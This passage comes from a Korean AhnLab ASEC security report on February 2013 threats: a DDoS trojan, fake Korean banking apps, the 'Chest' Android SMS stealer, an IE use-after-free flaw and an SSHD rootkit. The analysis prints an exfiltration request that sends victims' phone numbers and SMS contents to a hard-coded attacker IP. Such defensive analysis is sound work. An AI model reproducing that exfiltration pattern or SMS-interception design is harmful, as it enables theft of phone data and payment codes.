PC를제외하기위한것이거나, 보안제품에반영하기위한테스트를방해하기위한것으로추정된다. 네트워크트래픽발생악성코드 네트워크트래픽을발생시키는악성코드가또다시발견돼사용자들의주의가요구된다. 잊을만하면다시나타나는끈질긴존재감을가지고있는데, 지난 12월에다룬적이있는악성코드와유사하다. 이번에발견된악성코드역시전에다뤘던악성코드와비슷하다. 네트워크트래픽이증가하고, 감염된 PC의속도가눈에띄게느려지거나, 인터넷이작동하지않는증상이발생할수있다. 특히사무실과같이 LAN으로구성된환경에서네트워크트래픽이과도하게발생하면, 네트워크에연결된모든 PC들의네트워크가마비되는증상이발생하기도한다. 또한가정에서는최근인터넷으로 IPTV를이용하는가구가증가하고있는데, 악성코드에의한트래픽으로인해 TV 시청도영향을받을수있다. 각기업마다이상트래픽을탐지할수있는장비들이설치돼있는데, 이악성코드에감염되면 UDP 패킷이증가하기때문에장비에서이상트래픽이탐지될수있다. 이는동영상스트리밍서비스의 UDP 패킷과혼동할수있는데, 동영상감상은 In-bound 패킷이많고해당악성코드에의한패킷은 Out-bound 패킷이많은특징이있다. 이러한형태는추후방화벽설정에도참고할수있다. 그림 1-62 가상환경에서실행시발생하는실행불가메시지해당악성코드는 DDoS(Distributed Denial of Service, 분산서비스거부공격 ) 를목적으로제작된것으로보이며, 특히 UDP Flooding 기법을사용하는것이특징이다. 그리고이러한동작을하는악성코드는제작툴에의해너무쉽게만들어지고있는데파일을 Themida로패킹하거나가상환경에서의실행방해기능을지원한다. 또한생성되는파일의이름을지정할수있는데, 이러한네트워크트래픽이슈를발생시키는악성코드의대부분은 update.exe 파일이름을사용하는경향이있다. 이러한악성코드들은대부분온라인을통해유포되는데, 사용자가조금만주의를기울인다면충분히감염을예방할수있다. 이러한악성코드에감염되는것을사전에예방하기위한방법은다음과같다. 1. Windows 운영체제의최신서비스팩과보안업데이트를설치한다. 2. Internet Explorer, Flash Player, Acrobat Reader, Java 등의프로그램들을꾸준히업데이트하여최신버전을유지한다. 3. V3를최신엔진으로업데이트하고, 실시간감시를사용한다. 4. 정기적으로정밀검사를통해 PC에감염된악성코드가있는지확인하는습 그림 1-60 악성코드에의해다수의세션이생성되어네트워크점유 관을가진다. 해당악성코드는, 시스템폴더에랜덤한이름으로자신을복사하고 [ 그림 1-61] 과같이서비스에등록시켜부팅시마다자동으로실행되도록한다. <V3 제품군의진단명 > Win-Trojan/Agent.1391104 Trojan/Win32.Nitol
2012 년모바일악성코드동향 ASEC REPORT 38 19 03 악성코드동향 그뒤를이었다. PUP와 Trojan이접수된악성코드의대부분을차지하고있다. 지난 2012년한해동안과동일한유형의악성코드유형분포를보이지만 Trojan이 PUP보다더많이접수되었다는점이특징적이다. 모바일악성코드이슈 아래표는 2013년 1월접수된악성코드중접수량이가장많았던진단명 10건을꼽은것이다진단추가된악성코드중 Android-Trojan/ Opfake, Android-Trojan/FakeInst, Android-Trojan/FakeDoc은러시아에서유행하는악성코드로사용자가많이사용하는프로그램을가장해사용자의단말기에설치되며설치후프리미엄 SMS로문자를발송해이득을취하는유형의악성코드다. 1. 월간모바일악성코드접수량 [ 표 1-5] 는최근 3개월간 ASEC으로접수된모바일샘플중악성으로분류되어 V3 모바일에진단추가된악성샘플의수이다. 지난해 12월악성코드신고가감소했으나 2013년 1월에는 6만건이넘는악성코드가확인됐다. 번호 진단명 건수 비율 1 Android-PUP/Airpush 21401 33% 2 Android-Trojan/Opfake 11886 18% 3 Android-Trojan/FakeInst 10254 16% 4 Android-Trojan/FakeDoc 6420 10% 5 Android-PUP/Leadbolt 2495 4% 6 Android-PUP/Adwo 2030 3% 7 Android-Trojan/SmsSend 1673 3% 8 Android-PUP/Plankton 1615 2% 9 Android-PUP/Wapsx 774 1% 10 Android-Trojan/GinMaster 759 1% 표 1-6 모바일악성코드접수량최다 10건 플레이스토어를통한악성코드배포 표 1-5 2012 년 11 월부터 2013 년 1 월의모바일악성코드접수량 지난 1월구글공식마켓인구글플레이에 Lead team이라는개발자가제작한악성코드가등록됐다. 아래그림은구글플레이에악성코드를등록한개발자가등록한악성코드리스트를조회한것이다. 2. 악성코드유형 [ 그림 1-63] 은지난 1월한달동안접수된악성코드의유형이다. Trojan이 52.1% 로가장많은비율을차지하고있으며, PUP가 40% 로 그림 1-64 구글플레이에서조회한 Lead team 이등록한악성코드 그림 1-63 모바일악성코드진단명최다 10 건 악성코드제작자가등록한앱은국내은행앱과보안앱인 V3모바일플러스를사칭했다. 내부코드형태와기능이유사한앱들이 3일동안각기다른개발자의아이디로계속해서등록됐다. ASEC에서확보한변형의수는총 25건에이른다. 이번사건은구글플레이스토어에서도악성
20 코드배포가얼마든지가능함을확인시켜줬다. 구글플레이스토어와같은공식마켓에서앱을다운로드받을때도사용자의주의가필요하다. 이번에진단추가된악성앱의 V3모바일진단명은 Android=Trojan/ Yaps, Android-Trojan/PNStealer로아래는해당악성코드의동작에대한설명이다. 1. Android-Trojan/Yaps 구글플레이스토어를통해배포된악성앱으로모바일뱅킹앱을사칭한다. 확인된모바일뱅킹앱은 NH농협, KB국민은행, 새마을금고, 우리은행, IBK기업등이다. 그림 1-67 접속된인터넷뱅킹피싱사이트 2. Android-Trojan/PNStealer Android-Trojan/PNStealer는 V3모바일을가장한악성코드로설치된스마트폰의전화번호를외부로유출한다. 그림 1-65 Android-Trojan/Yaps 내부구조 Android-Trojan/Yaps는그림처럼아이콘파일과배경화면파일만을포함하는구조로이루어져있으며, 기능상시스템에요구하는권한이필요없기때문에설치시아무권한도요구하지않는다. 아래는 Android- Trojan/Yaps 변형중하나의설치및실행화면이다. Android-Trojan/PNStealer 설치시필요로하는권한은다음과같다. - android.permission.access_fine_location - android.permission.send_sms - android.permission.receive_sms - android.permission.receive_boot_completed - android.permission.internet - android.permission.access_coarse_location - android.permission.access_network_state - android.permission.write_external_storage - android.permission.access_wifi_state - android.permission.change_wifi_state - android.permission.read_phone_state [ 그림 1-68] 은 Android-Trojan/PNStealer 실행시사용자가확인할수있는화면이다. 그림 1-66 Android-Trojan/Yaps 실행화면 Android-Trojan/Yaps는내부에하드코딩된가짜은행사이트로접속을유도하는단순한기능만가진다. 앱에의해연결되는사이트는은행로그인패스워드와공인인증서를탈취하는전형적인인터넷뱅킹피싱사이트다. 그림 1-68 악성코드실행
21 사용자의 SMS 문자메시지를감시하고, 특정번호로수신된 SMS를악성코드제작자에게전송하도록설계됐다. 그동안꾸준히발견되고있는 체스트 악성앱과배포방식은동일하지만, 대부분소스코드가변경되어유포된것이특징이다. 그림 1-69 악성코드실행코드 [ 그림 1-73] 와같이문자메시지를통해스마트폰사용자에게유포됐다. 감염된단말기의번호를특정사이트로전송하며관련패킷은다음과같다. - http://42.121.116.83/weixin/api/post?data= :( 전화번호 ) 그림 1-73 악성앱설치유도문자메시지 그림 1-70 악성코드가통신하는원격시스템위치 단축URL로연결하여, 앱을설치하면아래와같은 발렌타인행사 아이콘이생성된다. 그림 1-71 전화번호유출코드 그림 1-74 악성앱설치화면 악성앱을실행하면아래와같은행사쿠폰화면이나타난다. 그림 1-72 전화번호유출패킷 발렌타인데이를겨냥한안드로이드악성앱발렌타인데이특수를이용해스마트폰사용자를노린안드로이드악성앱이발견됐다. 이번에발견된앱은 체스트 라고불리는악성앱과동일한악성행위를한다. 그림 1-75 허위행사쿠폰화면 [ 그림 1-75] 의상품중하나를선택하면아래와같이 시스템과부화로접속이어렵습니다. 잠시후에이용바랍니다. 라는메시지가
22 뜬다. 악성코드제작자는동시접속자가많은것으로오인하도록설계한것이다. 이후아래와같이스마트폰의전화번호와 SMS 메시지를전송한다. - mobile=0103*09****&revsms=123456789 악성코드제작자는이러한과정을통해소액결제이득을취하고있다. 악성앱에감염되면당일결제가이루어지기때문에스마트폰사용자의각별한주의가필요하다. 그림 1-76 허위메시지팝업 악성코드제작자는아래와같은코드를이용해특정번호 ( 송신자 ) 를포함하는 SMS를감시하고있다. 그림 1-80 소액결제피해사례 <V3 제품군의진단명 > Android-Trojan/Chest 체스트악성앱으로유출된개인정보를이용한스마트폰타깃공격 그림 1-77 특정번호로수신된 SMS 감시 수집코드 [ 그림 1-77] 과같이미리정의된번호로수신된 SMS는 [ 그림 1-78] 의코드를이용해, 스마트폰전화번호와함께특정서버로전송된다. 안드로이드기반의스마트폰사용자의소액결제인증번호를가로채는체스트 (Android-Trojan/Chest) 로인한사용자의피해가끊이지않고있다. 변종또한끊임없이유포되고있다. 최근유포되고있는악성앱과추가된코드는무엇인지살펴본다. 체스트 악성앱은사용자의 SMS 문자메시지를감시하고, 특정번호로수신된 SMS를악성코드제작자에게전송되도록설계됐다. 이를이용해소액결제인증번호를탈취한뒤, 그인증번호를이용해금전적이득을취하는형태다. 그동안꾸준히발견되고있는 체스트 악성앱과배포방식은동일하지만, 소스코드가일부추가, 변경됐다. 그림 1-78 전화번호와 SMS 를특정서버로전송하는코드 Mobile을인자값으로전화번호가전송되며, revsms를인자값으로 SMS를전송하도록설계됐다. 악성코드제작자는사전에입수한정보를바탕으로악성앱설치유도메시지를수신할대상자, 즉타깃을관리및모니터링하고있다. 실제전송되는과정을확인해보자. 그림 1-79 스마트폰전화번호와 SMS 전송패킷 그림 1-81 악성앱설치유도메시지발송을위한타깃리스트
23 타깃이정해지면, [ 그림 1-82] 와같은문자메시지를통해스마트폰사용자에게악성앱설치를유도한다. 악성앱이실행되면, 아래코드에의해스마트폰의전화번호가악성코드제작자에게전송된다. 감염된스마트폰의전화번호를수집함으로써, 소액결제를위한인증번호발송작업이진행된다. 그림 1-82 악성앱설치유도문자메시지 단축URL로연결해, 앱을설치하면 [ 그림 1-83] 과같은유명한커피전문점 **** 쿠폰 아이콘이생성되며, 서비스에등록된다. 그림 1-86 특정번호로수신된 SMS 감시및수집코드 위코드가실행되면 mobile= 전화번호 의형태로스마트폰의전화번호가전송된다. 이후악성코드제작자는아래와같은코드를이용해특정번호 ( 송신자 ) 를포함하는 SMS를감시한다. 그림 1-83 악성앱설치화면 ( 좌 ) / 실행중인서비스목록 ( 우 ) 악성앱의권한을확인함으로써악성행위 (SMS 감시및수집 ) 를유추할수있다. 그림 1-87 특정번호로수신된 SMS 감시및수집코드 [ 그림 1-86] 과같이미리정의된번호로발송된 SMS는아래와같은코드를이용해, 스마트폰전화번호와함께특정서버로전송된다. 그림 1-88 전화번호와 SMS 를특정서버로전송하는코드 그림 1-84 악성앱이요구하는권한정보악성앱을실행하면 [ 그림 1-85] 와같이시스템과부화로잠시후다시이용할것을권하고있다. 소액결제인증번호를수집하기위한시간을벌기위한것으로일정시간동안악성앱이삭제되는것을예방하고자계획된화면을보여주는것으로보인다. 위코드가실행되면 mobile= 전화번호 &revsms=sms내용 의형태로전화번호와문자메시지가전송된다. 악성코드제작자는 대리운전 과관련된다량의 SMS 때문에아래와같은코드를추가한것으로보인다. 아래의코드는 SMS를감시하면서 대리운전 메시지가도착하게되면즉시 SMS 감시를중지하고, 사용자에게 대리운전 메시지를전달한다. 제작자는더이상 앞뒤가똑같은대 리 운 전 15**-15** 꼭불러주세요 는받지않을것이다. 그림 1-89 대리운전 SMS 필터링 그림 1-85 의도된오류메시지팝업 악성앱제작자는악성코드에감염된사용자의리스트를관리하며, 수
24 집한 SMS 에서 소액결제인증번호 가존재하는지모니터링하고있다. 그림 1-90 감염자로부터전송된 SMS 내역 악성코드제작자는이러한과정을통해금전적이득을취하고있다. 악성앱에감염되면, 당일결제가이루어지기때문에스마트폰사용자의각별한주의가필요하다. 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다.
SECURITY TREND 25 01 보안동향 보안통계 2 월마이크로소프트보안업데이트현황 03 04 05 06 07 08 09 10 11 12 01 02 2013 년 2 월마이크로소프트사에서발표한보안업데이트는총 12 건 으로긴급 5 건, 중요 7 건이다. 이번보안업데이트중 MS13-009 는 실제공격코드가공개되어있는만큼각별한주의가필요하다. 긴급 MS13-009 Internet Explorer 누적보안업데이트 MS13-010 벡터표시언어의취약점으로인한원격코드실행문제점 MS13-011 미디어압축해제의취약점으로인한원격코드실행문제점 MS13-020 OLE 자동화의취약점으로인한원격코드실행문제점 MS13-012 Microsoft Exchange Server 의취약점으로인한원격코드실행문제점 중요 MS13-013 FAST Search Server 2010 for SharePoint 의구문분석취약점으로인한원격코드실행 MS13-014 NFS 서버의취약점으로인한서비스거부문제점 MS13-015.NET Framework 의취약점으로인한권한상승문제점 MS13-016 Windows 커널모드드라이버의취약점으로인한권한상승문제점 MS13-017 Windows 커널의취약점으로인한권한상승문제점 MS13-018 TCP/IP 의취약점으로인한서비스거부문제점 MS13-019 Windows CSRSS(Client/Server Run-time Subsystem) 의취약점으로인한권한상승문제점 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 표 2-1 2013 년 02 월주요 MS 보안업데이트 그림 2-1 공격대상기준별 MS 보안업데이트
SECURITY TREND 26 02 보안동향 보안이슈 IE SLayoutRun UAF 취약점 (CVE-2013-0025) 2월달의 IE 보안누적업데이트는비공개적으로보고된취약점 13건을해결했다. IE 를사용해특수하게조작된웹페이지를볼경우원격코드실행이허용될수있으며, 공격에성공한공격자는현재사용자와동일한권한을얻을수도있다. 여러취약점중에서도 CVE-2013-0025 는인터넷익스플로러 SLayoutRun 해제사용취약점공격코드가인터넷상에공개돼있어위험하다고할수있다. IE 8 에서원격코드실행이가능한것으로알려져있다. [ 그림 2-2] 는취약점을이용해사용자의시스템정보를살펴보는과정을보여주고있다. 스의변종인시타델 (Citadel) 트로이목마로확인됐는데, 이악성코드에감염되면패스워드등을빼내가기도하고, 원격의공격자에의해컴퓨터가제어될수도있다. 시타델은정보탈취기능이제우스에비해비약적으로강화됐다. 제우스가운영체제정보, 웹브라우저정보, 컴퓨터이름의기본정보정도만공격자에게전송했다면, 시타델은기본적인정보외에감염 PC 가소속된네트워크정보까지포함되어 APT까지고려한정보수집을시도했다. NBC.COM 의페이지에는일반적으로많이사용되는 IFrame 을삽입해악성코드설치를유도했다. NBC에서도해당사실을인지하고처리했으며, 사용자정보등이유출된것은없다고밝혔다. 국내에서도유명사이트가해킹되어 iframe 이삽입된경우가있다. 이렇게유명사이트를대상으로하는이유는, 다수의사용자가방문하기때문이다. 즉, 사용자방문이없는사이트여러곳보다유명한사이트한곳을해킹하면악성코드전파면에서더욱효율적이다. 앞으로이런형태는계속될것으로보이며, 기업들은안전한웹서비스제공을위해지속적인노력을펼쳐야할것이다. 리눅스기반의 SSHD 루트킷 그림 2-2 유투브에공개된취약점을이용한공격화면해당취약점은 IE 에서 CParaElement node 가해제될때해당참조가 CDoc 에계속남아있고, CDoc relayout 이재실행될때해당메모리가재사용되면서발생되는취약점이다. 공격코드가공개되어있는만큼패치적용을권고한다. NBC.com 을통한악성코드전파미국의 4대 TV 방송사중에하나인 NBC 웹사이트에서악성코드가배포됐다. 이번악성코드는인터넷뱅킹트로이목마류의하나인제우 2월초경웹호스팅커뮤니티를통해 SSHD 루트킷관련한내용이공유됐다. libkeyutils.so.1.9 라이브러리가 SSHD 와연관되어있고, 스팸을보내는데사용되고있다는내용이었다. 만약 libkeyutils.so.1.9 가여러분들의서버에있다면감염됐을확률이높다. 현재까지는처음어떻게발생했는지알려지지않고있다. 여러가지가능성으로 SSHD 자체에대한제로데이취약점이논의되긴했지만확인되지않은사실이다. 해킹형태는주로레드햇또는데비안기반의서버들이며서버제어프로그램중하나인 cpannel, DirectAdmin, Plesk 도영향을받는다. 침해당한시스템은기본사용자인증을수행하는형태로보고됐다. 해당라이브러리는패스워드를훔치고언제든지접근할수있는백
SECURITY TREND 27 도어및스팸발송기능을가지고있는것으로확인됐다. 패스워드는 DNS 패킷으로조작되어전송되는데, 해당라이브러리코드에전송할 IP 주소가하드코딩되어있다. 기본적으로해당정보는 strings 명령어로나타나지않는다. XOR 되어있기때문에해독해야문자열정보를확인할수있다. 앞서언급했듯이루트킷이설치되어있는지확인하려면 libkeyutils. so.1.9 라이브러리가존재하는지확인하면된다. 다음경로에서체크스크립트 ( http://www.cloudlinux.com/sshd-hack/check.sh ) 를다운로드받아실행해볼수도있다. 위스크립트는간단하게지정된경로에서해당라이브러리가존재하는지찾는다. SSH 접근을위해서는다음과같이권장한다. - 소프트웨어최신버전으로유지 - 방화벽등에서 SSH 포트접근제한 - ROOT 권한으로바로접근차단
WEB SECURITY TREND 28 01 웹보안동향 웹보안통계 악성코드유포웹사이트는감소추세안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하면, 2013년 2월악성코드를배포하는웹사이트를차단한건수는모두 8,267건이었다. 악성코드유형은총 333종, 악성코드가발견된도메인은 271개, 악성코드가발견된 URL은 909개였다. 이는 2013년 1월과비교할때악성코드발견건수, 악성코드유형은다소감소하였으나악성코드가발견된도메인, 악성코드가발견된 URL은증가한수치이다. 악성코드배포 URL 차단건수 8,900 8,267 02 01-7.1% 악성코드유형악성코드가발견된도메인악성코드가발견된 URL Graph 818 909 353 199 818 333 271 909 353 333 271 199 표 3-1 2013 년 2 월웹사이트보안현황 월별악성코드배포 URL 차단건수 2013년 2월악성코드배포웹사이트 URL 접근에대한차단건수 15,000 10,000 16,641 238.6% -7,741 8,900 46.5% -633 8,267 7.1% 는지난달 8900건에비해 7% 감소한 8267건이었다. 5,000 0 12 01 02 그림 3-1 월별악성코드배포 URL 차단건수변화추이
WEB SECURITY TREND 29 월별악성코드유형 2013년 2월의악성코드유형은전달의 353건에비해 6% 감소한 333건이다. 500 250 337 40.4% 353 333 4.7% 5.7% +16-20 0 12 01 02 그림 3-2 월별악성코드유형수변화추이 월별악성코드가발견된도메인 2013년 2월악성코드가발견된도메인은 271건으로 2013년 1 월의 199건에비해 36% 증가했 400 300 200 187 199 17.8% 6.4% +12 +72 271 36.1% 다. 100 0 12 01 02 그림 3-3 월별악성코드가발견된도메인수변화추이 월별악성코드가발견된 URL 2013년 3월악성코드가발견 1,000 692 50.4% +126 818 18.2% +91 909 11.1% 된 URL은전월의 818건에비해 11% 증가한 909건이었다. 500 0 12 01 02 그림 3-4 월별악성코드가발견된 URL 수변화추이
WEB SECURITY TREND 30 악성코드유형별배포수악성코드유형별배포수를보면트로이목마가 3337건 (40.4%) 로가장많았고, 애드웨어는 1792건 (21.7%) 으로조사됐다. 유형 건수 비율 TROJAN 3,337 40.4 % ADWARE 1,792 21.7 % DOWNLOADER 643 7.8 % DROPPER 242 2.9 % APPCARE 135 1.6 % Win32/VIRUT 117 1.4 % JOKE 14 0.2 % SPYWARE 3 0.0 % ETC 1,984 24.0 % TOTAL 8,267 100% 표 3-2 악성코드유형별배포수 TROJAN 3,934 ETC 2,603 4,000 ADWARE 1,145 DROPPER 517 2,500 DOWNLOADER 301 Win32/VIRUT 212 APPCARE 171 JOKE 15 SPYWARE 2 0 그림 3-5 악성코드유형별배포수 악성코드최다배포수악성코드배포최다 10건중에서 Adware/Win32.Clicker 가 1522건으로가장많았고 Trojan/Win32.KorAd 등 6건이새로등장했다. 순위 등락 악성코드명 건수 비율 1 2 Adware/Win32.Clicker 1,522 35.5 % 2 NEW Trojan/Win32.KorAd 1,028 23.9 % 3 NEW Win-Downloader/Agent.316552 412 9.6 % 4 1 ALS/Qfas 248 5.8 % 5 3 ALS/Bursted 239 5.6 % 6 NEW Packed/Win32.InstallCore 203 4.7 % 7 NEW Trojan/Win32.ADH 191 4.4 % 8 NEW Win32/Induc 178 4.1 % 9 3 Packed/Win32.Vmpbad 148 3.4 % 10 NEW Win-Trojan/Buzus.430080.F 131 3.0 % TOTAL 4,300 100 % 표 3-3 악성코드배포최다 10 건
WEB SECURITY TREND 31 02 웹보안동향 웹보안이슈 2013 년 2 월침해사이트현황 그림 3-6 2013 년월별침해사이트현황 [ 그림 3-6] 은악성코드를유포했던침해사이트들에대한월별통계로, 전체통계의증감부분에서는주목할만한요소는없었다. 침해사이트를통해서유포된악성코드최다 10 건 순위 악성코드명 건수 1 Trojan/Win32.Banki 9 2 Trojan/Win32.Patched 8 3 Trojan/Win32.OnlineGameHack 8 4 Win-Trojan/Downloader.76800.AL 8 5 Win-Trojan/Morix.118784 8 6 Trojan/Win32.OnlineGameHack 8 7 Win-Trojan/Qhost.845733 7 8 Win-Trojan/Downloader.62464.AP 7 9 Win-Trojan/Qhost.743424 7 10 Win-Trojan/Genome.58880.AE 7 표 3-4 침해사이트를통해서유포된악성코드최다 10건 위 [ 표 3-4] 는 2월한달동안가장많은사이트를통해서유포된악성코드최다 10건을산출한것이다. 온라인뱅킹사용자의계좌정보를탈취할목적을가진 Banki 또는 Qhost 계열의악성코드가대부분이다.
ASEC REPORT CONTRIBUTORS 집필진 책임연구원 차민석 선임연구원 강동현 선임연구원 안창용 선임연구원 이도현 선임연구원 장영준 주임연구원 김재홍 주임연구원 문영조 연구원 강민철 참여연구원 ASEC 연구원 SiteGuard 연구원 편집장책임연구원안형봉 편집인 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T. 031-722-8000 F. 031-722-8901 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved.